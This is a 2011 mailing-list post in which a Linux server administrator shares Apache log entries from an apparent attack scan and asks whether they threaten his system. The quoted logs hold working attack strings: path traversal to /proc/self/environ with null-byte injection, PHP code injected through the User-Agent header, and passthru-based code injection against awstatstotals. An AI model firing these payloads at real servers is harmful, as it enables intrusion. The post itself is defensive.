Re: Possible successful probe?
David Guntner <davidg-1boXBf7wef/[email protected]> Mon, 12 Dec 2011 07:37:20 -0800
| Newsgroups | gmane.linux.mandrake.expert |
|---|---|
| Organization | What a concept! :-) |
| Message-ID | <[email protected]> |
This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig9CBE9BCF5FD2FBA396623202
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
On 12/12/2011 07:29 AM, David Guntner wrote:
> Still running my semi-crippled 2011 install - haven't had a chance to d=
o
> anything about that, yet.... :-)
>=20
> Anyway, this morning's security run reported the following:
>=20
>> A total of 3 possible successful probes were detected (the following =
URLs
>> contain strings that match one or more of a listing of strings that
>> indicate a possible exploit):
>> =20
>> /?file=3D../../../../../../proc/self/environ%00 HTTP Response 200 =
>> /?mod=3D../../../../../../proc/self/environ%00 HTTP Response 200=20
>> /?page=3D../../../../../../proc/self/environ%00 HTTP Response 200 =
>=20
> That's all it says, so I'm not sure what the reset of the URL was.
> Question is, is the above anything I need to worry about? Is there
> going to be any information that they could get from the above that
> might allow them to compromise my machine?
As a followup, I checked the access log for Apache and found the
following, more complete information:
> mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /awstatstotals/a=
wstatstotals.php?sort=3D%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%=
7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 990 "-" "Mozilla/5.0 (Wind
> ows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
> mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?file=3D../../.=
=2E/../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"=
id\"); ?>"
> mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?page=3D../../.=
=2E/../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"=
id\"); ?>"
> mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?mod=3D../../..=
/../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"id\=
"); ?>"
> mail.rostcom.net - - [11/Dec/2011:13:16:15 -0800] "GET /index.php?optio=
n=3Dcom_simpledownload&controller=3D../../../../../../../../../../../../.=
=2E/../../proc/self/environ%00 HTTP/1.1" 404 990 "-" "<?php system(\"id\"=
); ?>"
> mail.rostcom.net - - [11/Dec/2011:13:16:15 -0800] "GET /site.php?a=3D{%=
24{passthru%28chr%28105%29.chr%28100%29%29}} HTTP/1.1" 404 990 "-" "Mozil=
la/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
=46rom the 404s at the end, it looks like whatever they were trying to do=
at that point failed. But I'm still a bit concerned about the 3 200s
leading up to it. So the question stands: Is there anything there that
someone could use to compromise the system?
--Dave
--------------enig9CBE9BCF5FD2FBA396623202
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk7mH7AACgkQvC3peSYrMN6MqgCfXSTu6SgTa6vzH1MWNxjgA1KU
jUMAnjejV15DKmIZLXMGkBbvNX1UrVga
=V+r9
-----END PGP SIGNATURE-----
--------------enig9CBE9BCF5FD2FBA396623202--